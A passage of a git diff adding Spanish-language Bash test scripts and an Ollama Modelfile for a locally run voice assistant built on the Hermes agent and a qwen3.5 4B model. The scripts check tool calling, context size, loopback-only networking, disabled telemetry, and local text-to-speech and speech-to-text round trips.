LOCAL.match(u): + fuera.append(f"{ruta} = {u}") + +anda(yaml.safe_load(open(sys.argv[1]))) +for f in fuera: + print(f) +PY +) +if [ -z "$FUERA" ]; then + echo " $(verde OK) ninguna URL de nube activa en el config"; _ok=$((_ok + 1)) +else + echo " $(rojo FALLO) hay URLs que salen de esta maquina:" + printf '%s\n' "$FUERA" | sed 's/^/ /' + _fallo=$((_fallo + 1)) +fi + +titulo "Desde donde mira el agente" + +# `cwd: "."` de fabrica NO es "el directorio desde el que lanzas hermes", por +# mucho que lo diga su documentacion: el agente arranca en $HOME. Con la raiz +# ahi, "lee verde/README.md" acaba leyendo $HOME/README.md β€”el de +# Gitleaksβ€” y resumiendolo perfectamente. Ningun error, respuesta inutil. +CWD_AGENTE=$(python3 -c " +import yaml +print(yaml.safe_load(open('$CONFIG')).get('terminal', {}).get('cwd', ''))" 2>/dev/null) +comprueba "el agente arranca en la raiz del proyecto" "$CWD_AGENTE" "$RAIZ" + +titulo "El lanzador entra donde debe" + +# Un `cd` antes de llamar a hermes NO basta: Hermes restaura el directorio que +# tenga apuntado en la sesion. El sintoma no parece de rutas β€” se le pide "lee +# verde/README.md y resumelo" y devuelve un resumen impecable de OTRO fichero, +# sin un solo error β€” asi que se comprueba estaticamente. +if grep -q -- '--in "\$RAIZ"' "$VERDE/verde-launcher.sh"; then + echo " $(verde OK) verde-launcher.sh pasa --in y no confia en el cd"; _ok=$((_ok + 1)) +else + echo " $(rojo FALLO) verde-launcher.sh no pasa --in: Hermes abrira en otro sitio" + _fallo=$((_fallo + 1)) +fi + +titulo "La voz apunta a la del naranja" + +# Sin esto la comparacion de voz entre carriles no diria nada: Hermes se +# descargaria su propia voz de Piper (la GPL de OHF-Voice) en vez de usar el +# binario MIT y el .onnx que ya tiene el naranja. +ORDEN=$(python3 -c " +import yaml +t = yaml.safe_load(open('$CONFIG')).get('tts', {}) +p = t.get('providers', {}).get(t.get('provider', ''), {}) +print(p.get('command', '')) +" 2>/dev/null) +case "$ORDEN" in + */verde/voz-verde.sh*) + echo " $(verde OK) TTS por comando -> voz-verde.sh"; _ok=$((_ok + 1)) ;; + *) + echo " $(rojo FALLO) el TTS no apunta al adaptador: $ORDEN"; _fallo=$((_fallo + 1)) ;; +esac + +stt_local() { # $1 = clave dentro de stt.local + python3 -c " +import yaml +print(yaml.safe_load(open('$CONFIG')).get('stt', {}).get('local', {}).get('$1', '')) +" 2>/dev/null | tr -d '\n' +} + +comprueba "la escucha es la local de Hermes" "$(stt_local model)" "small" + +# 839 MiB de pico contra una tarjeta con 3301 MiB de modelo dentro: whisper +# tiene que soltar la VRAM cuando calla, o la siguiente frase da OOM. +menor_que "whisper suelta la VRAM tras callar (s)" "$(stt_local unload_after_idle_seconds)" 601 + +resumen diff --git a/verde/pruebas/04_tool_calling.sh b/verde/pruebas/04_tool_calling.sh new file mode 100755 index 0000000..7527308 --- /dev/null +++ b/verde/pruebas/04_tool_calling.sh @@ -0,0 +1,105 @@ +#!/usr/bin/env bash +# LA DECISIVA: ΒΏemite el 4B llamadas a herramienta bien formadas? +# +# Es la duda que dejo abierta todo el carril. La guia de Hermes dice que para +# trabajo agentico completo hace falta gemma4:31b y marca SIN tool calling todo +# lo de 9B para abajo. qwen3.5 no sale en su tabla y si lo hace β€”el commit +# "el cerebro con tool calling nativo" lo demuestraβ€” pero lo demuestra en el +# arnes propio, que inyecta muchas menos definiciones por vuelta. +# +# Se pregunta al ENDPOINT directamente, sin Hermes de por medio, a proposito. +# Junta, estas dos preguntas se contestan mal: +# +# ΒΏsabe el modelo emitir una llamada? <- esto mide esta prueba +# ΒΏfunciona Hermes? <- eso es la ESCALERA +# +# Si esto falla, no hay nada que depurar en Hermes. Si esto pasa y el TUI se +# atraganta, el fallo esta en el arnes y se busca alli. +# +# Tres casos, no uno: uno que PIDE herramienta, uno que NO la necesita, y uno de +# dos argumentos. Un modelo que llama siempre es tan inutil como uno que no +# llama nunca, y con una sola pregunta no se distingue. + +cd "$(dirname "$0")" && . ./comun.sh + +titulo "Llamadas a herramienta" + +HERRAMIENTAS='[ + {"type":"function","function":{ + "name":"ejecuta_comando", + "description":"Ejecuta un comando de shell y devuelve su salida", + "parameters":{"type":"object","properties":{"comando":{"type":"string"}},"required":["comando"]}}}, + {"type":"function","function":{ + "name":"escribe_fichero", + "description":"Escribe texto en un fichero del disco", + "parameters":{"type":"object","properties":{ + "ruta":{"type":"string"},"contenido":{"type":"string"}},"required":["ruta","contenido"]}}} +]' + +# pregunta +pregunta() { + local desc=$1 texto=$2 espera=$3 cuerpo r + cuerpo=$(python3 -c " +import json, sys +print(json.dumps({ + 'model': '$MODELO', + 'messages': [{'role': 'user', 'content': sys.argv[1]}], + 'tools': json.loads(sys.argv[2]), +}))" "$texto" "$HERRAMIENTAS") + + r=$(curl -s --max-time 300 "$OLLAMA/v1/chat/completions" \ + -H 'Content-Type: application/json' -d "$cuerpo" 2>/dev/null) + + local salida + salida=$(printf '%s' "$r" | python3 -c " +import json, sys +try: + d = json.load(sys.stdin) +except Exception: + print('ILEGIBLE|'); raise SystemExit +if 'error' in d: + print('ERROR|' + str(d['error'])[:120]); raise SystemExit +m = d['choices'][0]['message'] +tc = m.get('tool_calls') or [] +if not tc: + print('PROSA|' + (m.get('content') or '')[:90].replace('\n', ' ')); raise SystemExit +f = tc[0]['function'] +try: + args = json.loads(f['arguments']) +except Exception: + print('ROTO|' + str(f['arguments'])[:90]); raise SystemExit +print(f\"{f['name']}|\" + json.dumps(args, ensure_ascii=False)[:90]) +") + local nombre=${salida%%|*} detalle=${salida#*|} + + if [ -z "$espera" ]; then + # aqui lo correcto es NO llamar + if [ "$nombre" = PROSA ]; then + printf ' %s %s\n' "$(verde OK)" "$desc" + printf ' %s\n' "$(gris "contesto: $detalle")" + _ok=$((_ok + 1)) + else + printf ' %s %s\n' "$(rojo FALLO)" "$desc" + printf ' llamo a %s cuando no hacia falta: %s\n' "$nombre" "$detalle" + _fallo=$((_fallo + 1)) + fi + return + fi + + if [ "$nombre" = "$espera" ]; then + printf ' %s %s\n' "$(verde OK)" "$desc" + printf ' %s\n' "$(gris "$nombre $detalle")" + _ok=$((_ok + 1)) + else + printf ' %s %s\n' "$(rojo FALLO)" "$desc" + printf ' esperado: %s\n obtenido: %s %s\n' "$espera" "$nombre" "$detalle" + _fallo=$((_fallo + 1)) + fi +} + +pregunta "llama cuando hace falta" "ΒΏCuΓ‘nto espacio libre queda en el disco?" "ejecuta_comando" +pregunta "acierta la herramienta y sus DOS argumentos" \ + "Guarda la palabra hola en el fichero /tmp/prueba-verde.txt" "escribe_fichero" +pregunta "NO llama cuando no hace falta" "ΒΏCuΓ‘nto son dos mΓ‘s dos? Contesta solo con el nΓΊmero." "" + +resumen diff --git a/verde/pruebas/05_cabe.sh b/verde/pruebas/05_cabe.sh new file mode 100755 index 0000000..642a1e5 --- /dev/null +++ b/verde/pruebas/05_cabe.sh @@ -0,0 +1,92 @@ +#!/usr/bin/env bash +# ΒΏCabe la pregunta? El bloqueo que paro el primer arranque. +# +# No es que qwen3.5:4b rindiera mal: es que el prompt fijo de Hermes β€”26 KB de +# sistema + 56 KB de esquemas de 19 herramientasβ€” son ~20.500 tokens contra los +# 4.096 de num_ctx del naranja. Cinco veces por encima. Con eso, la pregunta del +# usuario ni entra. +# +# DOS TRAMPAS que esta prueba evita, las dos costaron tiempo: +# +# 1. El directorio desde el que se lanza CAMBIA el prompt de sistema. Desde +# ~/.hermes/hermes-agent son 55.261 B en vez de 26.281: se cuela el AGENTS.md +# de 81 KB del propio repo de Hermes como fichero de contexto. Por eso aqui +# se hace cd a la raiz del proyecto, que es lo que hace verde-launcher.sh. +# +# 2. El contexto que se compara es el del MODELFILE, no el de /api/show. Ollama +# reporta ahi 262144, el maximo del modelo, no lo configurado. + +cd "$(dirname "$0")" && . ./comun.sh + +titulo "El prompt fijo, medido" + +SALIDA=$TMP/prompt-size.txt +( cd "$RAIZ" && timeout 180 hermes prompt-size ) > "$SALIDA" 2>&1 +if [ $? -ne 0 ] || ! grep -q 'System prompt total' "$SALIDA"; then + echo " $(rojo FALLO) 'hermes prompt-size' no dio una medida" + sed 's/^/ /' "$SALIDA" | head -5 + exit 1 +fi + +# Se parsea con python y no con awk por el awk de Debian: mawk no admite el +# match() de tres argumentos de gawk y devolveria vacio en silencio, que en una +# resta da un numero plausible y equivocado. +# +# " System prompt total : 26,278 B (25.7 KB, 26,148 chars)" +# " Tool schemas : 55,978 B (54.7 KB, 19 tools)" +leer=$(python3 - "$SALIDA" <<'PY' +import re, sys +texto = open(sys.argv[1]).read() + +def bytes_de(etiqueta): + m = re.search(re.escape(etiqueta) + r'\s*:\s*([\d,]+)\s*B', texto) + return int(m.group(1).replace(',', '')) if m else 0 + +herr = re.search(r'([\d,]+)\s+tools', texto) +print(bytes_de('System prompt total'), bytes_de('Tool schemas'), + herr.group(1).replace(',', '') if herr else '?') +PY +) +read -r SISTEMA ESQUEMAS HERRAM <<<"$leer" + +if [ "${SISTEMA:-0}" -eq 0 ] || [ "${ESQUEMAS:-0}" -eq 0 ]; then + echo " $(rojo FALLO) no pude leer las cifras de 'hermes prompt-size'" + sed 's/^/ /' "$SALIDA" | head -8 + exit 1 +fi + +FIJO=$((SISTEMA + ESQUEMAS)) +# ~4 B por token en castellano y JSON. Es la misma regla con la que se dimensiono +# el modelo verde; sirve para decidir, no para presumir de precision. +TOKENS=$((FIJO / 4)) + +nota "sistema $SISTEMA B" +nota "esquemas $ESQUEMAS B ($HERRAM herramientas)" +nota "fijo $FIJO B ~ $TOKENS tokens" + +titulo "Contra el contexto configurado" + +CTX=$(parametro "$MODELO" num_ctx) +nota "num_ctx del Modelfile: $CTX" + +menor_que "el prompt fijo cabe en el contexto" "$TOKENS" "$CTX" + +# Que quepa no basta: si no sobra sitio, Hermes comprime el historial en cuanto +# empiece la conversacion y el agente se olvida de lo que acaba de hacer. El +# suelo son los 2000 que usa arrancar.sh para avisar. +HUECO=$((CTX - TOKENS)) +nota "quedan ~$HUECO tokens para la conversacion" +mayor_que "queda sitio para conversar" "$HUECO" 2000 + +# El otro tope, el escondido: 300 tokens de num_predict cortan el JSON de una +# tool call por la mitad. El naranja lo hereda del modelo base y es correcto +# para el β€”respuestas habladas cortasβ€”, pero aqui seria un fallo silencioso. +mayor_que "la respuesta no se corta a media llamada" \ + "$(parametro "$MODELO" num_predict)" 1024 + +titulo "De donde viene el numero" + +nota "medido con cd a $RAIZ" +nota "desde ~/.hermes/hermes-agent saldrian ~30 KB mas (su AGENTS.md de 81 KB)" + +resumen diff --git a/verde/pruebas/06_privacidad.sh b/verde/pruebas/06_privacidad.sh new file mode 100755 index 0000000..6d222e8 --- /dev/null +++ b/verde/pruebas/06_privacidad.sh @@ -0,0 +1,90 @@ +#!/usr/bin/env bash +# Que siga siendo local. Es la premisa del carril, asi que se verifica igual que +# cualquier otra cosa en vez de darla por hecha. +# +# Misma idea que pruebas/06_privacidad.sh del naranja, con las preguntas que +# aplican aqui: alli se interroga a gsettings, aqui al .env, al YAML y a ss. +# +# Lo que SI puede salir, y no es fallo, se lista al final para que no sorprenda: +# el navegador si el agente decide navegar, y la comprobacion de versiones. + +cd "$(dirname "$0")" && . ./comun.sh + +titulo "Credenciales" + +# Las 11 lineas con valor del .env no son claves: son TERMINAL_TIMEOUT, +# BROWSER_SESSION_TIMEOUT, banderas de depuracion y similares. Se busca por el +# NOMBRE de la variable, que es lo que distingue una clave de un ajuste. +CLAVES=$(grep -vE '^\s*#|^\s*$' "$HERMES/.env" 2>/dev/null \ + | grep -iE '^[A-Z_]*(API_KEY|TOKEN|SECRET|PASSWORD|CREDENTIAL)[A-Z_]*=.+' \ + | grep -vE '=\s*$' | wc -l) +comprueba "cero credenciales con valor en el .env" "$CLAVES" "0" + +# Sin tokens de mensajeria el gateway no arranca, que es justo lo que se quiere: +# un canal de mensajeria es la unica pieza del carril que sacaria conversaciones +# de esta maquina. +MENSAJERIA=$(grep -vE '^\s*#|^\s*$' "$HERMES/.env" 2>/dev/null \ + | grep -icE '^(TELEGRAM|DISCORD|SLACK|WHATSAPP|SIGNAL|TEAMS|QQ)[A-Z_]*=.+') +comprueba "cero tokens de mensajeria" "$MENSAJERIA" "0" + +titulo "La red" + +# Ollama es el cerebro: tiene que escuchar, pero solo aqui. +FUERA=$(ss -ltn 2>/dev/null | awk 'NR>1 {print $4}' \ + | grep -E '^(0\.0\.0\.0|\*|\[::\]):(11434|8000|8080|3000)$' | wc -l) +comprueba "ningun puerto nuestro escucha fuera de loopback" "$FUERA" "0" + +OLLAMA_LOCAL=$(ss -ltn 2>/dev/null | awk 'NR>1 {print $4}' | grep -c '127.0.0.1:11434') +comprueba "ollama escucha SOLO en 127.0.0.1" "$OLLAMA_LOCAL" "1" + +# Conexiones salientes vivas de hermes en este momento. Cero es lo normal: la +# 04 y la 05 hablan con 127.0.0.1. +SALIENTES=$(ss -tnp 2>/dev/null | grep -c 'hermes' || true) +nota "conexiones de hermes ahora mismo: ${SALIENTES:-0}" + +titulo "El cerebro no sale de aqui" + +BASE=$(config_model base_url) +case "$BASE" in + http://127.0.0.1:*|http://localhost:*) + echo " $(verde OK) inferencia en esta maquina ($BASE)"; _ok=$((_ok + 1)) ;; + *) + echo " $(rojo FALLO) la inferencia sale a $BASE"; _fallo=$((_fallo + 1)) ;; +esac + +# telemetry es de Hermes y viene en el config; si se enciende, sale. No es una +# bandera suelta sino un arbol β€”hoy telemetry.shared_metrics.enabledβ€” asi que se +# recorre entero: leer solo la clave de arriba devolvia el diccionario y la +# prueba fallaba con la telemetria APAGADA, que es la peor forma de fallar. +ENCENDIDAS=$(python3 - "$CONFIG" <<'PY' +import sys, yaml + +encendidas = [] + +def anda(nodo, ruta="telemetry"): + if isinstance(nodo, dict): + for k, v in nodo.items(): + if k == "enabled" and v is True: + encendidas.append(ruta) + else: + anda(v, f"{ruta}.{k}") + elif nodo is True and ruta.endswith("enabled"): + encendidas.append(ruta) + +anda(yaml.safe_load(open(sys.argv[1])).get('telemetry', {}) or {}) +print(",".join(encendidas)) +PY +) +if [ -z "$ENCENDIDAS" ]; then + echo " $(verde OK) telemetria apagada en todas sus ramas"; _ok=$((_ok + 1)) +else + echo " $(rojo FALLO) telemetria encendida en: $ENCENDIDAS"; _fallo=$((_fallo + 1)) +fi + +titulo "Salidas conocidas, que no son fallo" + +nota "el navegador (Playwright/Chromium) SOLO si el agente decide navegar" +nota "hermes update comprueba versiones contra su repo cuando se le pide" +nota "el driver de Computer Use esta INSTALADO pero nada lo invoca hoy" + +resumen diff --git a/verde/pruebas/07_voz.sh b/verde/pruebas/07_voz.sh new file mode 100755 index 0000000..5901b3c --- /dev/null +++ b/verde/pruebas/07_voz.sh @@ -0,0 +1,88 @@ +#!/usr/bin/env bash +# Que el verde hable, y que hable IGUAL que el naranja. +# +# No es un detalle estetico. Si el verde sonara con una voz que Piper se +# descarga por su cuenta β€”la GPL de OHF-Voice que trae Hermes de serieβ€”, +# comparar los dos carriles no diria nada: la mitad de la impresion de un +# asistente de voz es el timbre. +# +# Por eso el TTS de Hermes va por comando (type: command, sin documentar en su +# web pero si en tools/tts_tool.py) contra voz-verde.sh, que es un adaptador de +# 15 lineas al mismo config/jarvis-piper.sh del naranja: mismo binario Piper +# 1.2.0 MIT, mismo .onnx, misma cadena de audio. +# +# La prueba llama al adaptador EXACTAMENTE como lo llama Hermes: dos argumentos, +# el WAV de salida y un FICHERO con el texto. Es donde estaba la trampa β€” +# jarvis-piper.sh quiere el texto como argumentoβ€” y una interfaz mal encajada no +# se ve hasta que suena mal. +# +# No suena nada: se genera el fichero y se mide. + +cd "$(dirname "$0")" && . ./comun.sh + +titulo "El adaptador" + +afirma "existe voz-verde.sh" test -x "$VERDE/voz-verde.sh" +afirma "existe jarvis-piper.sh del naranja" test -x "$RAIZ/config/jarvis-piper.sh" + +titulo "Generar" + +TEXTO=$TMP/texto.txt +WAV=$TMP/voz.wav +rm -f "$WAV" +printf 'A sus Γ³rdenes, seΓ±or. Todos los sistemas responden con normalidad.' > "$TEXTO" + +INICIO=$(date +%s.%N) +"$VERDE/voz-verde.sh" "$WAV" "$TEXTO" >"$TMP/voz.log" 2>&1 +SALIO=$? +TARDO=$(awk "BEGIN{printf \"%.2f\", $(date +%s.%N) - $INICIO}") + +if [ $SALIO -ne 0 ] || [ ! -s "$WAV" ]; then + echo " $(rojo FALLO) voz-verde.sh no genero el WAV (codigo $SALIO)" + sed 's/^/ /' "$TMP/voz.log" | head -8 + exit 1 +fi +echo " $(verde OK) WAV generado en ${TARDO}s"; _ok=$((_ok + 1)) + +titulo "El fichero" + +# soxi/ffprobe no estan garantizados: se lee la cabecera RIFF a mano, que son +# cuatro campos en posiciones fijas y no depende de nada instalado. +leer=$(python3 - "$WAV" <<'PY' +import struct, sys, wave +with wave.open(sys.argv[1]) as w: + print(w.getframerate(), w.getnchannels(), w.getsampwidth() * 8, + round(w.getnframes() / w.getframerate(), 2)) +PY +) +read -r HZ CANALES BITS SEGUNDOS <<<"$leer" + +comprueba "22050 Hz, como el naranja" "$HZ" "22050" +comprueba "mono" "$CANALES" "1" +comprueba "16 bits" "$BITS" "16" + +# Frase de ~4 s. Si sale mucho mas corta, Piper se comio el texto; si sale mucho +# mas larga, el tono esta mal y sonaria a camara lenta. +mayor_que "dura lo que una frase (s)" "$SEGUNDOS" 2 +menor_que "y no se alarga de mas (s)" "$SEGUNDOS" 12 + +# Tiempo real: 0,34 s para 3,2 s de audio, medido el 15 ago. Es CPU, no toca la +# grafica, asi que no compite con el modelo. +RATIO=$(awk "BEGIN{printf \"%.2f\", $TARDO / $SEGUNDOS}") +nota "sintesis $TARDO s para $SEGUNDOS s de audio (x$RATIO del tiempo real)" +menor_que "sintetiza mas rapido de lo que dura" "$RATIO" 1 + +titulo "La misma voz que el naranja" + +# voz-verde.sh copia al NUCLEO (nucleo/boca/voz.py: POR_DEFECTO = "davefx"), no +# al README, que describe sharvard y es del JARVIS sobre Newelle. Se compara +# contra el nucleo porque es contra quien se va a comparar el carril. +VOZ_VERDE=$(grep -oP 'JARVIS_PIPER_VOZ:-\K[^}]+' "$VERDE/voz-verde.sh") +VOZ_NUCLEO=$(grep -oP 'POR_DEFECTO\s*=\s*"\K[^"]+' "$RAIZ/nucleo/boca/voz.py" 2>/dev/null) +if [ -z "$VOZ_NUCLEO" ]; then + nota "no pude leer la voz del nucleo; comparacion omitida" +else + comprueba "misma voz que el nucleo" "$VOZ_VERDE" "es_ES-${VOZ_NUCLEO}-medium" +fi + +resumen diff --git a/verde/pruebas/08_escucha.sh b/verde/pruebas/08_escucha.sh new file mode 100755 index 0000000..709b365 --- /dev/null +++ b/verde/pruebas/08_escucha.sh @@ -0,0 +1,73 @@ +#!/usr/bin/env bash +# Que el verde ESCUCHE, y en local. El complemento del 07 (que hable). +# +# El TUI de Hermes no tiene microfono, y su STT nativo es para notas de voz de +# mensajeria β€”que saldrian de la maquinaβ€”. El puente escucha-verde.sh cierra el +# hueco con faster-whisper local (el mismo 'small' en espanol que ya declara la +# seccion stt: del config.yaml), en CPU para no pelear por la VRAM con el 4B. +# +# La prueba no necesita microfono: hace un BUCLE. Genera voz con el mismo TTS del +# verde (voz-verde.sh, 07), la transcribe con escucha_transcribe.py, y comprueba +# que el texto vuelve entero. Si el oido funciona, lo que entro por el altavoz +# sale por el transcriptor. + +cd "$(dirname "$0")" && . ./comun.sh + +PY=$RAIZ/nucleo/venv/bin/python +[ -x "$PY" ] || PY=$(command -v python3) +TRANS=$VERDE/escucha_transcribe.py + +titulo "Las piezas" + +afirma "existe escucha_transcribe.py" test -f "$TRANS" +afirma "existe el puente escucha-verde.sh" test -x "$VERDE/escucha-verde.sh" +afirma "faster-whisper importa" "$PY" -c "import faster_whisper" +afirma "el TTS del verde existe (para el bucle)" test -x "$VERDE/voz-verde.sh" + +# quita acentos y baja a minusculas, para comparar sin depender de la tilde +_norm() { "$PY" -c "import sys,unicodedata as u; t=u.normalize('NFD',sys.stdin.read().lower()); print(''.join(c for c in t if u.category(c)!='Mn'))"; } + +titulo "El bucle voz -> texto" + +# (frase dicha, palabras clave que TIENEN que volver). Se evita 'jarvis' a +# proposito: es un nombre raro y whisper lo oye 'harvis'; eso no mide el oido. +probar_frase() { + local frase=$1 claves=$2 + local wav=$TMP/oir.wav txt=$TMP/oir.txt + printf '%s' "$frase" > "$txt" + rm -f "$wav" + "$VERDE/voz-verde.sh" "$wav" "$txt" >/dev/null 2>&1 + if [ ! -s "$wav" ]; then + echo " $(rojo FALLO) no se genero el WAV para: $frase"; _fallo=$((_fallo+1)); return + fi + local ini out norm falta="" + ini=$(date +%s.%N) + out=$(timeout 120 "$PY" "$TRANS" "$wav" 2>/dev/null) + local tardo; tardo=$(awk "BEGIN{printf \"%.1f\", $(date +%s.%N) - $ini}") + norm=$(printf '%s' "$out" | _norm) + local c + for c in $claves; do + printf '%s' "$norm" | grep -q "$c" || falta="$falta $c" + done + if [ -z "$falta" ]; then + printf ' %s escucho: "%s" (%ss)\n' "$(verde OK)" "$out" "$tardo"; _ok=$((_ok+1)) + else + printf ' %s faltan [%s] en: "%s"\n' "$(rojo FALLO)" "$falta" "$out"; _fallo=$((_fallo+1)) + fi +} + +probar_frase "cuanto espacio libre queda en el disco" "espacio disco" +probar_frase "abre el navegador y busca el tiempo en madrid" "navegador tiempo madrid" +probar_frase "apaga las luces del salon a las diez" "luces salon" + +titulo "Local de verdad" + +# El transcriptor no debe abrir ningun socket a la nube: se comprueba que el +# codigo no importa clientes de APIs de STT de pago. +if grep -qiE "openai|groq|mistral|requests\.post|urllib.*http" "$TRANS"; then + echo " $(rojo FALLO) el transcriptor referencia una API remota"; _fallo=$((_fallo+1)) +else + echo " $(verde OK) el transcriptor no llama a ninguna API remota"; _ok=$((_ok+1)) +fi + +resumen diff --git a/verde/pruebas/comun.sh b/verde/pruebas/comun.sh new file mode 100755 index 0000000..d9c9133 --- /dev/null +++ b/verde/pruebas/comun.sh @@ -0,0 +1,111 @@ +#!/usr/bin/env bash +# Utilidades compartidas por las pruebas del verde. No se ejecuta suelto. +# +# Misma forma que pruebas/comun.sh del naranja β€”comprueba, afirma, resumenβ€” para +# que las dos suites se lean igual. Lo que cambia es a QUE se le pregunta: alli +# es gsettings dentro de un flatpak, aqui es un YAML, ollama y un binario. +# +# Ninguna prueba de esta carpeta abre el TUI ni habla por el altavoz. + +RAIZ=$(cd -P "$(dirname "${BASH_SOURCE[0]:-$0}")/../.." && pwd) +VERDE=$RAIZ/verde +CONFIG=$HOME/.hermes/config.yaml +HERMES=$HOME/.hermes +OLLAMA=${OLLAMA_URL:-http://127.0.0.1:11434} +MODELO=qwen3.5:4b-verde +NARANJA=qwen3.5:4b-jarvis + +TMP=${TMPDIR:-/tmp}/jarvis-verde-pruebas +mkdir -p "$TMP" + +_ok=0 +_fallo=0 + +verde() { printf '\033[32m%s\033[0m' "$1"; } +rojo() { printf '\033[31m%s\033[0m' "$1"; } +gris() { printf '\033[90m%s\033[0m' "$1"; } + +# comprueba +comprueba() { + local desc=$1 obtenido=$2 esperado=$3 + if [ "$obtenido" = "$esperado" ]; then + printf ' %s %s\n' "$(verde OK)" "$desc" + _ok=$((_ok + 1)) + else + printf ' %s %s\n' "$(rojo FALLO)" "$desc" + printf ' esperado: %s\n obtenido: %s\n' "$esperado" "$obtenido" + _fallo=$((_fallo + 1)) + fi +} + +# afirma β€” pasa si el comando devuelve 0 +afirma() { + local desc=$1; shift + if "$@" >/dev/null 2>&1; then + printf ' %s %s\n' "$(verde OK)" "$desc" + _ok=$((_ok + 1)) + else + printf ' %s %s\n' "$(rojo FALLO)" "$desc" + printf ' fallo: %s\n' "$*" + _fallo=$((_fallo + 1)) + fi +} + +# menor_que +menor_que() { + local desc=$1 valor=$2 tope=$3 + if awk "BEGIN{exit !($valor < $tope)}"; then + printf ' %s %s %s\n' "$(verde OK)" "$desc" "$(gris "($valor < $tope)")" + _ok=$((_ok + 1)) + else + printf ' %s %s %s\n' "$(rojo FALLO)" "$desc" "$(gris "($valor >= $tope)")" + _fallo=$((_fallo + 1)) + fi +} + +# mayor_que +mayor_que() { + local desc=$1 valor=$2 suelo=$3 + if awk "BEGIN{exit !($valor > $suelo)}"; then + printf ' %s %s %s\n' "$(verde OK)" "$desc" "$(gris "($valor > $suelo)")" + _ok=$((_ok + 1)) + else + printf ' %s %s %s\n' "$(rojo FALLO)" "$desc" "$(gris "($valor <= $suelo)")" + _fallo=$((_fallo + 1)) + fi +} + +titulo() { printf '\n\033[1m%s\033[0m\n' "$1"; } + +nota() { printf ' %s %s\n' "$(gris 'Β·')" "$1"; } + +resumen() { + printf '\n %s pasan Β· %s fallan\n' "$(verde $_ok)" \ + "$([ $_fallo -eq 0 ] && gris 0 || rojo $_fallo)" + [ $_fallo -eq 0 ] +} + +# Lo que ocupa la tarjeta ahora mismo, en MiB. +vram() { nvidia-smi --query-gpu=memory.used --format=csv,noheader 2>/dev/null | tr -d ' MiB'; } + +# Un parametro del Modelfile tal y como lo tiene ollama guardado. Se pregunta a +# ollama y no al fichero del repo: el Modelfile del repo es la intencion, esto +# es lo que de verdad se va a cargar. arrancar.sh recrea el modelo al medir el +# techo de contexto, asi que los dos pueden diferir legitimamente. +parametro() { # $1 = modelo $2 = parametro + ollama show --modelfile "$1" 2>/dev/null \ + | awk -v p="$2" '$1=="PARAMETER" && $2==p {print $3; exit}' +} + +# El bloque model: del config.yaml, PARSEADO. Nunca leido con grep: el fichero +# declara provider y base_url dos veces dentro de model: y en YAML gana la +# ultima. Leyendolo parecia local y el trafico salia por OpenRouter. +config_model() { # $1 = clave + python3 -c " +import yaml, sys +try: + print(yaml.safe_load(open('$CONFIG'))['model'].get('$1', '')) +except Exception as e: + print('ERROR:', e) +" 2>/dev/null | tr -d '\n' +} diff --git a/verde/pruebas/ejecutar.sh b/verde/pruebas/ejecutar.sh new file mode 100755 index 0000000..2bb7189 --- /dev/null +++ b/verde/pruebas/ejecutar.sh @@ -0,0 +1,39 @@ +#!/usr/bin/env bash +# Pasa las pruebas del verde y resume. +# +# ./ejecutar.sh todas +# ./ejecutar.sh 04 05 solo esas +# +# NINGUNA abre el TUI ni suena por el altavoz. Lo que no se puede automatizar +# β€”si contesta bien, si encadena herramientas, si la voz convenceβ€” esta en +# ESCALERA.md, que se recorre a mano. +# +# Van en este orden porque cada una explica los fallos de la siguiente: sin +# tarjeta libre (01) no carga el modelo (02), sin modelo no hay tool calling +# (04), y sin que quepa el prompt (05) el TUI dara respuestas truncadas que +# parecen otra cosa. + +cd "$(dirname "$0")" + +if [ $# -gt 0 ]; then + PRUEBAS=() + for n in "$@"; do PRUEBAS+=("$(ls "${n}"_*.sh 2>/dev/null | head -1)"); done +else + PRUEBAS=($(ls [0-9][0-9]_*.sh)) +fi + +FALLADAS=() +for p in "${PRUEBAS[@]}"; do + [ -n "$p" ] || continue + [ -x "$p" ] || chmod +x "$p" 2>/dev/null + "./$p" || FALLADAS+=("$p") +done + +printf '\n\033[1m════════════════════════════════════\033[0m\n' +if [ ${#FALLADAS[@]} -eq 0 ]; then + printf '\033[32m todo en orden\033[0m\n' + printf '\033[90m siguiente: ../verde-launcher.sh y seguir ../ESCALERA.md\033[0m\n' + exit 0 +fi +printf '\033[31m fallan: %s\033[0m\n' "${FALLADAS[*]}" +exit 1 diff --git a/verde/qwen3.5-4b-verde.Modelfile b/verde/qwen3.5-4b-verde.Modelfile new file mode 100644 index 0000000..a4277f7 --- /dev/null +++ b/verde/qwen3.5-4b-verde.Modelfile @@ -0,0 +1,60 @@ +# Variante de qwen3.5:4b para el carril VERDE: contexto grande para el arnes. +# +# ollama create qwen3.5:4b-verde -f verde/qwen3.5-4b-verde.Modelfile +# +# ── Por que hace falta una variante propia ───────────────────────────────── +# +# El naranja usa qwen3.5:4b-jarvis, afinado para lo contrario que esto: +# respuestas habladas cortas y VRAM libre para whisper. Medido con +# `hermes prompt-size` desde $HOME/COFRE/CODERS/JARVIS: +# +# prompt de sistema de Hermes 26.281 B +# esquemas de las 19 herramientas 55.978 B +# ───────────────────────────────────────────── +# fijo, antes de decir nada 82.259 B β‰ˆ 20.500 tokens +# +# Contra los num_ctx 4096 del naranja. Cinco veces por encima: no es que rinda +# mal, es que no entra la pregunta. +# +# ── Y el numero NO se elige por lo que cabe, sino por lo que Hermes exige ── +# +# CORREGIDO EL 16 DE AGOSTO. Aqui ponia num_ctx 32768 con las 32 capas en GPU, +# elegido como "lo mas que cabe en la GPU". Dos cosas mal: +# +# 1. 32768 con 32 capas da cudaMalloc failed. Lo que cabia asi era 24576. +# 2. Da igual: Hermes RECHAZA cualquier modelo por debajo de 64.000 tokens +# (MINIMUM_CONTEXT_LENGTH, agent/model_metadata.py). Es un tope duro y no +# se ve hasta que abres el TUI. +# +# O sea que el contexto no se negocia: 65536. Lo que se mide entonces es +# cuantas capas caben con ese contexto, y son 16 de 32 (medido el 16 ago: +# 32 y 24 dan OOM; con 16 son 2795 MiB en tarjeta y ~3 GB en RAM). +# +# El precio son las 16 capas que van por CPU, y se paga en el prefill de los +# ~20.500 tokens del prompt fijo. Ver la tabla de tiempos en NOTAS.md. +# +# ── num_predict: el tope que no se ve venir ──────────────────────────────── +# +# El naranja hereda num_predict 300 del modelo BASE (no lo pone su Modelfile). +# 300 tokens cortan el JSON de una llamada a herramienta por la mitad, y el +# sintoma seria "el modelo no sabe llamar herramientas", que es falso. Hay que +# sobrescribirlo aqui a mano. +# +# ── temperature ─────────────────────────────────────────────────────────── +# +# El base trae 0.4, bien para conversar. Emitir JSON valido no es conversar: +# se baja a 0.2. Menos invencion en los nombres de parametros. +# OJO: ollama NO admite comentarios 